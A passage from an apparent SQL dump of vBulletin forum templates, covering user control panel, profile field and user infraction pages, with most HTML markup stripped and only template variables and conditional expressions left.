    \r\n\r\n$template_hook[usercp_main_pos4]\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $infractionbits\r\n\r\n
    \r\n \r\n $vbphrase[x_points_total]\r\n    \r\n \"\"\r\n \r\n $vbphrase[latest_infractions_received]\r\n
     $vbphrase[post]$vbphrase[date]$vbphrase[expires]$vbphrase[points]$vbphrase[reason]$vbphrase[posted_by]
    \r\n
    \r\n\r\n
    \r\n\r\n$template_hook[usercp_main_pos5]\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $reputationcommentbits\r\n\r\n
    \r\n \r\n $vbphrase[x_points_total]\r\n    \r\n \"\"\r\n \r\n $vbphrase[latest_reputation_received]\r\n
     $vbphrase[thread]$vbphrase[date]$vbphrase[posted_by]$vbphrase[comment]
    \r\n
    \r\n\r\n
    \r\n\r\n$template_hook[usercp_main_pos6]\r\n\r\n\r\n\r\n \r\n \r\n\r\n
     $forumjump
    ', 'template', 1214929026, 'vBulletin Solutions', '3.7.1', 'vbulletin'), (1675, -1, 'usercp_groupattentionbit', '$stylevar[dirmark]session->vars[\'sessionurl\'] . \"groupid=$group[groupid]&do=manage\\\">$group[name] ($group[moderatedmembers])', '$stylevar[dirmark]$group[name] ($group[moderatedmembers])', 'template', 1196869946, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1676, -1, 'usercp_groupinvitebit', 'session->vars[\'sessionurl\'] . \"groupid=$group[groupid]\\\">$group[name]', '$group[name]', 'template', 1196871699, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1677, -1, 'usercp_nav_folderbit', '\r\n $foldername\r\n', '\r\n $foldername\r\n', 'template', 1068353472, 'vBulletin Solutions', '', 'vbulletin'), (1678, -1, 'usercp_newvisitormessagebit', '\r\n \\\"\\\"\r\n \r\n \r\n
    \r\n $visitormessage[formattedtime]\r\n $userbit\r\n
    \r\n \r\n', '\r\n \"\"\r\n \r\n
    \r\n $visitormessage[formatteddate]\r\n $visitormessage[summary]\r\n
    \r\n
    \r\n $visitormessage[formattedtime]\r\n $userbit\r\n
    \r\n \r\n', 'template', 1197374794, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1679, -1, 'usercp_reputationbits', '\r\n \\\"\\\"\r\n \r\n \".(($reputation[\'title\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"p=$reputation[postid]#post$reputation[postid]\\\">$reputation[title]\r\n \") : (\"\r\n $vbphrase[n_a]\r\n \")).\"\r\n \r\n $reputation[dateline] $reputation[timeline]\r\n \".(($GLOBALS[\'vbulletin\']->options[\'showuserraters\']) ? (\"\r\n \r\n \".(($reputation[\'username\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"u=$reputation[whoadded]\\\">$reputation[username]\r\n \") : (\"\r\n $vbphrase[n_a]\r\n \")).\"\r\n \r\n \") : (\"\")).\"\r\n $reputation[reason]\r\n', '\r\n \"\"\r\n \r\n \r\n $reputation[title]\r\n \r\n $vbphrase[n_a]\r\n \r\n \r\n $reputation[dateline] $reputation[timeline]\r\n \r\n \r\n \r\n $reputation[username]\r\n \r\n $vbphrase[n_a]\r\n \r\n \r\n \r\n $reputation[reason]\r\n', 'template', 1232367782, 'vBulletin Solutions', '3.8.1', 'vbulletin'), (1680, -1, 'USERCP_SHELL', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $pagetitle\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \".(($show[\'customizelink\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'privacylink\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'profilepiclink\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n\r\n \r\n \".(($show[\'socialgroupslink\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'publicgroups\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'albumlink\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'avatarlink\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'siglink\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n \r\n \r\n\".(($show[\'pmmainlink\']) ? (\"\r\n\r\n \r\n\r\n \r\n \".(($show[\'pmsendlink\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'pmtracklink\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n\") : (\"\")).\"\r\n\r\n \r\n\r\n \r\n \r\n\r\n\".(($show[\'moderation\']) ? (\"\r\n\r\n\".(($show[\'deleteditems\']) ? (\"\r\n \r\n \r\n \r\n \".(($show[\'deletedvms\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'deletedgms\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'deleteddiscussions\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'deletedpcs\']) ? (\"\") : (\"\")).\"\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'moderateditems\']) ? (\"\r\n \r\n \".(($show[\'moderatedposts\']) ? (\"\r\n \r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'moderatedvms\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'moderatedgms\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'moderateddiscussions\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'moderatedpcs\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'moderatedpics\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'newitems\']) ? (\"\r\n \r\n \".(($show[\'newvms\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'newgms\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'newdiscussions\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'newpcs\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'newpics\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n\") : (\"\")).\"\r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'popups\'] AND $show[\'moderation\']) ? (\"\r\n\r\n \r\n \".(($show[\'deleteditems\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'moderateditems\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'newitems\']) ? (\"\") : (\"\")).\"\r\n\r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n\".(($show[\'paidsubscriptions\']) ? (\"\r\n\r\n\") : (\"\")).\"\r\n\".(($show[\'attachments\']) ? (\"\r\n\r\n\") : (\"\")).\"\r\n\r\n$template_hook[usercp_navbar_bottom]\r\n
    session->vars[\'sessionurl_q\'] . \"\\\">$vbphrase[your_control_panel]
    session->vars[\'sessionurl\'] . \"u=\" . $GLOBALS[\'vbulletin\']->userinfo[\'userid\'] . \"\\\">$vbphrase[your_profile]
    session->vars[\'sessionurl\'] . \"do=editprofile\\\">$vbphrase[edit_your_details]
    session->vars[\'sessionurl\'] . \"do=customize\\\">$vbphrase[customize_profile]
    session->vars[\'sessionurl\'] . \"do=privacy\\\">$vbphrase[profile_privacy]
    session->vars[\'sessionurl\'] . \"do=editprofilepic\\\">$vbphrase[edit_profile_picture]
    $vbphrase[networking]
    session->vars[\'sessionurl\'] . \"do=buddylist\\\">\".(($show[\'friends_and_contacts\']) ? (\"$vbphrase[contacts_and_friends]\") : (\"$vbphrase[contacts]\")).\"
    session->vars[\'sessionurl_q\'] . \"\\\">$vbphrase[social_groups]
    session->vars[\'sessionurl\'] . \"do=editusergroups\\\">$vbphrase[group_memberships]
    session->vars[\'sessionurl\'] . \"u=\" . $GLOBALS[\'vbulletin\']->userinfo[\'userid\'] . \"\\\">$vbphrase[pictures_and_albums]
    $vbphrase[settings_and_options]
    session->vars[\'sessionurl\'] . \"do=editavatar\\\">$vbphrase[edit_avatar]
    session->vars[\'sessionurl\'] . \"do=editsignature\\\">$vbphrase[edit_signature]
    session->vars[\'sessionurl\'] . \"do=editpassword\\\">$vbphrase[edit_email_and_password]
    session->vars[\'sessionurl\'] . \"do=editoptions\\\">$vbphrase[edit_options]
    session->vars[\'sessionurl\'] . \"do=ignorelist\\\">$vbphrase[edit_ignore_list]
    \r\n $vbphrase[private_messages] \".(($show[\'popups\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'popups\']) ? (\"\r\n
    \r\n \r\n \r\n \r\n \r\n $cpnav[pmfolders]\r\n
    $vbphrase[folders]
    \r\n
    \r\n \") : (\"\")).\"\r\n
    session->vars[\'sessionurl_q\'] . \"\\\">$vbphrase[list_messages]
    session->vars[\'sessionurl\'] . \"do=newpm\\\">$vbphrase[send_new_message]
    session->vars[\'sessionurl\'] . \"do=trackpm\\\">$vbphrase[track_messages]
    session->vars[\'sessionurl\'] . \"do=editfolders\\\">$vbphrase[edit_folders]
    \r\n $vbphrase[subscribed_threads] \".(($show[\'popups\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'popups\']) ? (\"\r\n
    \r\n \r\n \r\n \r\n \r\n $cpnav[subsfolders]\r\n
    $vbphrase[folders]
    \r\n
    \r\n \") : (\"\")).\"\r\n
    session->vars[\'sessionurl\'] . \"do=viewsubscription\\\">$vbphrase[list_subscriptions]
    session->vars[\'sessionurl\'] . \"do=editfolders\\\">$vbphrase[edit_folders]
    $vbphrase[deleted_items]
    session->vars[\'sessionurl\'] . \"do=viewthreads&type=deleted\\\">$vbphrase[threads]
    session->vars[\'sessionurl\'] . \"do=viewposts&type=deleted\\\">$vbphrase[posts]
    session->vars[\'sessionurl\'] . \"do=viewvms&type=deleted\\\">$vbphrase[visitor_messages]
    session->vars[\'sessionurl\'] . \"do=viewgms&type=deleted\\\">$vbphrase[group_messages]
    session->vars[\'sessionurl\'] . \"do=viewdiscussions&type=deleted\\\">$vbphrase[group_discussions]
    session->vars[\'sessionurl\'] . \"do=viewpcs&type=deleted\\\">$vbphrase[picture_comments]
    $vbphrase[moderated_items]
    session->vars[\'sessionurl\'] . \"do=viewthreads&type=moderated\\\">$vbphrase[threads]
    session->vars[\'sessionurl\'] . \"do=viewposts&type=moderated\\\">$vbphrase[posts]
    session->vars[\'sessionurl\'] . \"do=viewvms&type=moderated\\\">$vbphrase[visitor_messages]
    session->vars[\'sessionurl\'] . \"do=viewgms&type=moderated\\\">$vbphrase[group_messages]
    session->vars[\'sessionurl\'] . \"do=viewdiscussions&type=moderated\\\">$vbphrase[group_discussions]
    session->vars[\'sessionurl\'] . \"do=viewpcs&type=moderated\\\">$vbphrase[picture_comments]
    session->vars[\'sessionurl\'] . \"do=viewpics\\\">$vbphrase[album_pictures]
    $vbphrase[new_items]
    session->vars[\'sessionurl\'] . \"do=viewvms&type=new\\\">$vbphrase[visitor_messages]
    session->vars[\'sessionurl\'] . \"do=viewgms&type=new\\\">$vbphrase[group_messages]
    session->vars[\'sessionurl\'] . \"do=viewdiscussions&type=new\\\">$vbphrase[group_discussions]
    session->vars[\'sessionurl\'] . \"do=viewpcs&type=new\\\">$vbphrase[picture_comments]
    session->vars[\'sessionurl\'] . \"do=viewpics&type=new\\\">$vbphrase[album_pictures]
    $vbphrase[moderation]
    $vbphrase[deleted_items]
    $vbphrase[moderated_items]
    $vbphrase[new_items]
    $vbphrase[miscellaneous]
    session->vars[\'sessionurl\'] . \"do=viewreminder\\\">$vbphrase[event_reminders]
    session->vars[\'sessionurl_q\'] . \"\\\">$vbphrase[paid_subscriptions]
    session->vars[\'sessionurl\'] . \"do=editattachments\\\">$vbphrase[attachments]
    \r\n\r\n\r\n\".(($show[\'popups\'] AND $show[\'moderation\']) ? (\"\r\n\r\n\".(($show[\'deleteditems\']) ? (\"\r\n\r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'moderateditems\']) ? (\"\r\n
    \r\n \r\n\r\n \r\n \".(($show[\'moderatedposts\']) ? (\"\r\n \r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'moderatedvms\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'moderatedgms\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'moderateddiscussions\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'moderatedpcs\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'moderatedpics\']) ? (\"\") : (\"\")).\"\r\n\r\n
    $vbphrase[moderated_items]
    session->vars[\'sessionurl\'] . \"do=viewthreads&type=moderated\\\">$vbphrase[threads]
    session->vars[\'sessionurl\'] . \"do=viewposts&type=moderated\\\">$vbphrase[posts]
    session->vars[\'sessionurl\'] . \"do=viewvms&type=moderated\\\">$vbphrase[visitor_messages]
    session->vars[\'sessionurl\'] . \"do=viewgms&type=moderated\\\">$vbphrase[group_messages]
    session->vars[\'sessionurl\'] . \"do=viewdiscussions&type=moderated\\\">$vbphrase[group_discussions]
    session->vars[\'sessionurl\'] . \"do=viewpcs&type=moderated\\\">$vbphrase[picture_comments]
    session->vars[\'sessionurl\'] . \"do=viewpics\\\">$vbphrase[album_pictures]
    \r\n
    \r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'newitems\']) ? (\"\r\n
    \r\n \r\n\r\n \r\n \".(($show[\'newvms\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'newgms\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'newdiscussions\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'newpcs\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'newpics\']) ? (\"\") : (\"\")).\"\r\n\r\n
    $vbphrase[new_items]
    session->vars[\'sessionurl\'] . \"do=viewvms&type=new\\\">$vbphrase[visitor_messages]
    session->vars[\'sessionurl\'] . \"do=viewgms&type=new\\\">$vbphrase[group_messages]
    session->vars[\'sessionurl\'] . \"do=viewdiscussions&type=new\\\">$vbphrase[group_discussions]
    session->vars[\'sessionurl\'] . \"do=viewpcs&type=new\\\">$vbphrase[picture_comments]
    session->vars[\'sessionurl\'] . \"do=viewpics&type=new\\\">$vbphrase[album_pictures]
    \r\n
    \r\n\r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n\") : (\"\")).\"\r\n \r\n
      \r\n\r\n\r\n$HTML\r\n\r\n\r\n
    \r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n $vboptions[bbtitle] - $pagetitle\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n \r\n\r\n \r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n$template_hook[usercp_navbar_bottom]\r\n
    $vbphrase[your_control_panel]
    $vbphrase[your_profile]
    $vbphrase[edit_your_details]
    $vbphrase[customize_profile]
    $vbphrase[profile_privacy]
    $vbphrase[edit_profile_picture]
    $vbphrase[networking]
    $vbphrase[contacts_and_friends]$vbphrase[contacts]
    $vbphrase[social_groups]
    $vbphrase[group_memberships]
    $vbphrase[pictures_and_albums]
    $vbphrase[settings_and_options]
    $vbphrase[edit_avatar]
    $vbphrase[edit_signature]
    $vbphrase[edit_email_and_password]
    $vbphrase[edit_options]
    $vbphrase[edit_ignore_list]
    \r\n $vbphrase[private_messages] \r\n \r\n
    noneblock\">\r\n \r\n \r\n \r\n \r\n $cpnav[pmfolders]\r\n
    $vbphrase[folders]
    \r\n
    \r\n
    \r\n
    $vbphrase[list_messages]
    $vbphrase[send_new_message]
    $vbphrase[track_messages]
    $vbphrase[edit_folders]
    \r\n $vbphrase[subscribed_threads] \r\n \r\n
    noneblock\">\r\n \r\n \r\n \r\n \r\n $cpnav[subsfolders]\r\n
    $vbphrase[folders]
    \r\n
    \r\n
    \r\n
    $vbphrase[list_subscriptions]
    $vbphrase[edit_folders]
    $vbphrase[deleted_items]
    $vbphrase[threads]
    $vbphrase[posts]
    $vbphrase[visitor_messages]
    $vbphrase[group_messages]
    $vbphrase[group_discussions]
    $vbphrase[picture_comments]
    $vbphrase[moderated_items]
    $vbphrase[threads]
    $vbphrase[posts]
    $vbphrase[visitor_messages]
    $vbphrase[group_messages]
    $vbphrase[group_discussions]
    $vbphrase[picture_comments]
    $vbphrase[album_pictures]
    $vbphrase[new_items]
    $vbphrase[visitor_messages]
    $vbphrase[group_messages]
    $vbphrase[group_discussions]
    $vbphrase[picture_comments]
    $vbphrase[album_pictures]
    $vbphrase[moderation]
    $vbphrase[deleted_items]
    $vbphrase[moderated_items]
    $vbphrase[new_items]
    $vbphrase[miscellaneous]
    $vbphrase[event_reminders]
    $vbphrase[paid_subscriptions]
    $vbphrase[attachments]
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n
      \r\n\r\n\r\n$HTML\r\n\r\n\r\n
    \r\n\r\n$footer\r\n\r\n', 'template', 1228217678, 'vBulletin Solutions', '3.8.0 Release Candidate 1', 'vbulletin'), (1681, -1, 'userfield_checkbox_option', '', '', 'template', 1199994839, 'vBulletin Solutions', '3.7.0 Beta 4', 'vbulletin'), (1682, -1, 'userfield_optional_input', '\r\n \".(($show[\'optionspage\']) ? (\"\r\n $vbphrase[or_enter_your_choice_here]:\r\n \") : (\"\r\n $vbphrase[or_enter_your_choice_here]:
    \r\n \")).\"\r\n', '\r\n \r\n $vbphrase[or_enter_your_choice_here]:\r\n \r\n $vbphrase[or_enter_your_choice_here]:
    \r\n
    \r\n', 'template', 1182960252, 'vBulletin Solutions', '3.6.8', 'vbulletin'), (1683, -1, 'userfield_radio', '\r\n \r\n \r\n \r\n \r\n \r\n \r\n $optionalfield\r\n
    $profilefield[description]
    \r\n \r\n $radiobits\r\n
    \r\n \r\n
    ', '\r\n \r\n \r\n \r\n \r\n \r\n \r\n $optionalfield\r\n
    $profilefield[description]
    \r\n \r\n $radiobits\r\n
    \r\n \r\n
    ', 'template', 1199993518, 'vBulletin Solutions', '3.7.0 Beta 4', 'vbulletin'), (1684, -1, 'userfield_radio_option', '', '', 'template', 1199994902, 'vBulletin Solutions', '3.7.0 Beta 4', 'vbulletin'), (1685, -1, 'userfield_select', '\r\n \r\n \r\n \r\n \r\n \r\n \r\n $optionalfield\r\n
    $profilefield[description]
    \r\n \".(($show[\'optionspage\']) ? (\"\") : (\"\")).\"\r\n\r\n \r\n\r\n \".(($show[\'optionspage\']) ? (\"\") : (\"\")).\"\r\n\r\n \r\n
    ', '\r\n \r\n \r\n \r\n \r\n \r\n \r\n $optionalfield\r\n
    $profilefield[description]
    \r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n
    ', 'template', 1193764575, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1686, -1, 'userfield_select_multiple', '\r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $profilefield[description]
    \r\n \".(($show[\'optionspage\']) ? (\"\") : (\"\")).\"\r\n\r\n \r\n\r\n \".(($show[\'optionspage\']) ? (\"\") : (\"\")).\"\r\n\r\n \r\n
    \r\n\r\n', '\r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $profilefield[description]
    \r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n
    \r\n\r\n', 'template', 1193764609, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1687, -1, 'userfield_select_option', '', '', 'template', 1068173170, 'vBulletin Solutions', '', 'vbulletin'), (1688, -1, 'userfield_textarea', '\r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $profilefield[description]
    \r\n \r\n\r\n \r\n
    ', '\r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $profilefield[description]
    \r\n \r\n\r\n \r\n
    ', 'template', 1206451852, 'vBulletin Solutions', '3.7.0 Release Candidate 2', 'vbulletin'), (1689, -1, 'userfield_textbox', '\r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $profilefield[description]
    \r\n userinfo[$profilefieldname] . \"\\\" size=\\\"$profilefield[size]\\\" maxlength=\\\"$profilefield[maxlength]\\\" />\r\n\r\n \r\n
    ', '\r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $profilefield[description]
    \r\n \r\n\r\n \r\n
    ', 'template', 1193764644, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1690, -1, 'userfield_wrapper', '
    \r\n $profilefield[title]\r\n $custom_field_holder\r\n
    ', '
    \r\n $profilefield[title]\r\n $custom_field_holder\r\n
    ', 'template', 1193767296, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1691, -1, 'userinfraction', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[user_infraction]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\".(($show[\'pm\']) ? (\"\r\n
    \r\n\") : (\"\r\n\r\n\")).\"\r\n\r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n \".(($foruminfo[forumid]) ? (\"$vbphrase[forum]: session->vars[\'sessionurl\'] . \"f=$foruminfo[forumid]\\\">$foruminfo[title]\") : (\"\")).\"\r\n $vbphrase[user_infraction]\r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n $userinfo[username]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \".(($show[\'groups\']) ? (\"\r\n \r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'possiblegroups\']) ? (\"\r\n\r\n \r\n \r\n \r\n \r\n \".(($show[\'moregroups\']) ? (\"\r\n $moregroups\r\n \") : (\"\")).\"\r\n \") : (\"\")).\"\r\n
    $vbphrase[infractions_active_total]$userinfo[infractions] / $totalinfractions
    $vbphrase[points]$userinfo[ipoints]
    $vbphrase[warnings]$userinfo[warnings]
    $vbphrase[current_infraction_groups]$infractiongroups
    $vbphrase[possible_infraction_groups]\" . construct_phrase(\"$vbphrase[x_y_points]\", \"$firstgroup\", \"$firstpoints\") . \"
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n
    \r\n $vbphrase[infraction_level]\r\n \r\n \r\n \r\n \".(($show[\'count\']) ? (\"\") : (\"\")).\"\r\n \r\n \r\n \r\n \r\n $infractionbits\r\n \".(($show[\'custominfraction\']) ? (\"\r\n \r\n \r\n \r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n
    $vbphrase[title]$vbphrase[active]$vbphrase[points]$vbphrase[expires]$vbphrase[warning]
    $vbphrase[custom_infraction]
    \r\n \r\n \r\n \".(($infractionbits) ? (\"\") : (\"\")).\"\r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[reason]
    $vbphrase[points]
    $vbphrase[expires]
     
    \r\n
    \r\n
    \r\n\r\n \".(($show[\'banreason\']) ? (\"\r\n
    \r\n $vbphrase[automatic_ban]\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $banbits\r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[ban_usergroup]$vbphrase[points]$vbphrase[infractions]$vbphrase[ban_period]
    $vbphrase[ban_reason]
    \r\n \r\n
    \r\n\r\n
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n\r\n
    \r\n\r\n\r\n
    \r\n\r\n$postpreview\r\n\r\n\".(($show[\'pm\']) ? (\"\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[post_new_private_message]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[administrative_note]
      \\\"$selectedicon[alt]\\\"
    \r\n \r\n\r\n \r\n
    $vbphrase[message_to_user]
    \r\n $messagearea\r\n \r\n\r\n $posticons\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \\\"\\\"\r\n $vbphrase[additional_options]\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[miscellaneous_options]\r\n
    \r\n \".(($show[\'trackpm\']) ? (\"
    \") : (\"\")).\"\r\n
    \r\n \".(($GLOBALS[\'vbulletin\']->userinfo[\'signature\']) ? (\"
    \") : (\"\")).\"\r\n \".(($show[\'parseurl\']) ? (\"
    \") : (\"\")).\"\r\n $disablesmiliesoption\r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n$forumrules\r\n\") : (\"\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[send_new_message]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[administrative_note]
    \r\n \r\n
    \r\n \r\n\r\n \".(($show[\'email\']) ? (\"\r\n \r\n
    \r\n $vbphrase[message_to_user]
    \r\n \r\n
    \r\n \r\n \") : (\"\")).\"\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n
    \r\n\")).\"\r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[user_infraction]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n
    onsubmit=\"return vB_Editor[\'$editorid\'].prepare_submit(0, 0)\">\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[forum]: $foruminfo[title]\r\n $vbphrase[user_infraction]\r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n $userinfo[username]\r\n 90%25%\" align=\"center\">\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n $moregroups\r\n \r\n \r\n
    $vbphrase[infractions_active_total]$userinfo[infractions] / $totalinfractions
    $vbphrase[points]$userinfo[ipoints]
    $vbphrase[warnings]$userinfo[warnings]
    $vbphrase[current_infraction_groups]$infractiongroups
    $vbphrase[possible_infraction_groups]$vbphrase[x_y_points]
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n
    \r\n $vbphrase[infraction_level]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $infractionbits\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[title]$vbphrase[active]$vbphrase[points]$vbphrase[expires]$vbphrase[warning]
    54\">$vbphrase[custom_infraction]
    54\">\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[reason]
    $vbphrase[points]
    $vbphrase[expires]
     
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[automatic_ban]\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $banbits\r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[ban_usergroup]$vbphrase[points]$vbphrase[infractions]$vbphrase[ban_period]
    $vbphrase[ban_reason]
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n\r\n
    \r\n\r\n\r\n
    \r\n\r\n$postpreview\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[post_new_private_message]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[administrative_note]
      \"$selectedicon[alt]\"
    \r\n \r\n\r\n \r\n
    $vbphrase[message_to_user]
    \r\n $messagearea\r\n \r\n\r\n $posticons\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \"\"\r\n $vbphrase[additional_options]\r\n
    \r\n
    \r\n
